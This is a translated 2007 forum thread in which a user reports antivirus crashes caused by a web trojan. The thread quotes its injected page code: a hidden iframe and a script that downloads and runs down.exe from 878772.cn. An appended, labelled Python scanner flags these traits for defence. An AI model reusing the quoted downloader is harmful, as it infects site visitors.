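New-era web page virus protection software -- TW (everyone, please come in and discuss)
Today when I opened the two websites below, both triggered a virus warning: [url=http://blog.vckbase.com/Search.aspx?q=tlist]http://blog.vckbase.com/Search.aspx?q=tlist[/url]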
[url=http://bbs.fhzw.net/]http://bbs.fhzw.net/[/url]
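For virus 1 shown in the picture below, after the prompt pops up and I click Block, TW always crashes after 3 times! So I am posting it here for the boss to see what is going on. The attached RAR contains the virus files!
But it is not necessarily these two websites that carry the virus; my system may be infected, which would cause this!
[[i] This post was last edited by sbyguli on 2007-7-15 21:40 [/i]]
I checked with 超级巡警 (Super Patrol): those three yellow entries were not there originally. After TW crashed, those three yellow DLLs appeared. So although TW detected the virus, it failed to block it effectively, what a pity!
[[i] This post was last edited by sbyguli on 2007-7-15 21:44 [/i]]
After the virus activated, there was one more entry in the startup items! Below are the virus's web page files.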
arp.htm
[quote]<iframe src='http://878772.cn/arp.htm' width=0 height=0></iframe> <HTML>
<body style="CURSOR: url(wm/xjz2007.bmp)"></body>
<iframe width='100' height='100' src='vip.htm'></iframe>
<iframe width='100' height='100' src='wm/wm1.htm'></iframe>
<iframe width='100' height='100' src='wm/wm2.htm'></iframe>
<iframe width='100' height='100' src='wm/wm3.htm'></iframe>
//count1(tongji123)
<script language="javascript" src="[url=http://ww4.tongji123.com/t1.aspx?id=43559969]http://ww4.tongji123.com/t1.aspx?id=43559969"></script[/url]>
//count2(51la)
<script language="javascript" type="text/javascript" sr c="[url=http://js.users.51.la/1023960.js]ht tp://js.users.51.la/1023960.js"></script>[/url]
[/quote]
Part of wm/wm1.htm:
[quote] <ifr ame sr c='http://878772.cn/arp.htm' width=0 height=0></iframe> <script>
document.writeln("<script language=\"javaScript\">");
document.writeln("microsofts=\"[url=http://www.878772.cn/down.exe\]http://www.878772.cn/down.exe\[/url]"");
document.writeln("microsofts1=\"microsofts.exe\"");
document.writeln("microsofts2=\"microsofts.vbs\"");
document.writeln("BianYuanZhe=\"[url=file://\\x42\\x44\\x39\\x36\\x43\\x35\\x35\\x36\\x2D\\x36\\x35\\x41\\x33\\x2D\\x31\\x31\\x44\\x30\\x2D\\x39\\x38\\x33\\x41\\x2D\\x30\\x30\\x43\\x30\\x34\\x46\\x43\\x32\\x39\\x45\\x33\\x36\]\\x42\\x44\\x39\\x36\\x43\\x35\\x35\\x36\\x2D\\x36\\x35\\x41\\x33\\x2D\\x31\\x31\\x44\\x30\\x2D\\x39\\x38\\x33\\x41\\x2D\\x30\\x30\\x43\\x30\\x34\\x46\\x43\\x32\\x39\\x45\\x33\\x36\[/url]"");
document.writeln("function Log(vip)");
document.writeln("{");
document.writeln(" var log=document.createElement(\'p\');");
document.writeln(" log.innerHTML=vip;");
document.writeln("}");
document.writeln("function CreateO(o,n)");
document.writeln("{");
document.writeln(" var r=null;");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n)\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n,\"\")\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if(!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n,\"\",\"\")\')");
document.writeln(" }");[/quote]
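[[i] This post was last edited by sbyguli on 2007-7-15 21:52 [/i]]
A typical web trojan: it automatically generates the main trojan program locally. Generally, when the download is an exe file, 99.9999% of the time there is a problem, though it seems hardly anyone does it this way nowadays, right?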
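Added example, not part of the original thread or of TW: a static triage script that flags the traits visible in the quoted arp.htm and wm1.htm (a zero-size iframe, a long run of \x escapes that decodes to a CLSID, a CreateObject call, and an .exe URL). The sample page is constructed, its host is a placeholder, and all function names are hypothetical.

```python
import re

# Constructed sample modelled on the quoted arp.htm / wm1.htm; the host is a placeholder.
CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"  # what the \x.. string in wm1.htm decodes to
ESCAPED = "".join("\\\\x%02X" % ord(c) for c in CLSID)  # doubled backslashes, as quoted
SAMPLE = (
    "<iframe src='http://malware.example.invalid/arp.htm' width=0 height=0></iframe>\n"
    "<iframe width='100' height='100' src='wm/wm1.htm'></iframe>\n"
    '<script>document.writeln("BianYuanZhe=\\"' + ESCAPED + '\\"");\n'
    'document.writeln("microsofts=\\"http://malware.example.invalid/down.exe\\"");\n'
    "document.writeln(\" eval(\\'r=o.CreateObject(n)\\')\");</script>\n"
)

IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"(\w+)\s*=\s*['\"]?([^'\"\s>]+)")
HEX_RUN = re.compile(r"(?:\\+x[0-9A-Fa-f]{2}){8,}")  # 8 or more consecutive \xNN escapes
GUID = re.compile(r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}")
EXE_URL = re.compile(r"https?://[^\s\"'\\]+\.exe\b", re.I)

def hidden_iframes(html):
    """Return the src of every iframe whose width or height is 0."""
    found = []
    for tag in IFRAME.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag.group(1))}
        if attrs.get("width") == "0" or attrs.get("height") == "0":
            found.append(attrs.get("src", ""))
    return found

def decode_hex_runs(text):
    """Decode each run of \\xNN escapes (any number of backslashes) to plain text."""
    return ["".join(chr(int(h, 16)) for h in re.findall(r"x([0-9A-Fa-f]{2})", run.group()))
            for run in HEX_RUN.finditer(text)]

def scan(html):
    """Collect the indicators; an empty result does not prove the page is clean."""
    return {
        "hidden_iframes": hidden_iframes(html),
        "escaped_clsids": [s for s in decode_hex_runs(html) if GUID.fullmatch(s)],
        "exe_urls": EXE_URL.findall(html),
        "createobject": "CreateObject(" in html,
    }

if __name__ == "__main__":
    for key, value in scan(SAMPLE).items():
        print(key, "->", value)
```

Any one of these traits can occur on a benign page; it is the combination, as in the quoted files, that makes a page worth isolating for closer analysis.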